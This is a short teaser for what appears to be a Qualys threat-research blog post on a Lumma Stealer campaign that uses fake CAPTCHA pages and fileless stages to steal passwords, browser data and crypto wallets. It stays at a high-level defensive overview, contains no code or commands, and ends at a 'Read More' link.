Summary Lumma Stealer is an information-stealing malware available through a Malware-as-a-Service (MaaS). It specializes in stealing sensitive data such as passwords, browser information, and cryptocurrency wallet details. The attacker has advanced its tactics, moving from traditional phishing to fake CAPTCHA verification, exploiting legitimate software to deliver Lumma Stealer. These deceptive delivery methods make Lumma Stealer a persistent threat. Fig 1: Lumma Stealer Execution Chain Threat actors frequently create phishing sites hosted on various providers, often leveraging Content Delivery Networks (CDNs). These sites either utilize exploits or trick users into achieving payload execution. The Qualys Threat Research Unit (TRU) has been monitoring an active Lumma Stealer campaign. Recently, we came across the use of fake CAPTCHA pages to trick users into executing the payload. It uses muti-stage fileless techniques to deliver its final payload, which makes this threat deceptive and persistent. We investigated the entire attack chain, from initial infection to data exfiltration. We assessed the Qualys EDR tool to showcase how it can effectively protect against such threats. We also provided some key threat detection and hunting queries that analysts can incorporate and add to their playbooks, which effectively protect against such threats in real time. Campaign Analysis We speculate that users are redirected to these fake CAPTCHA sites by bad actors exploiting legit…Read More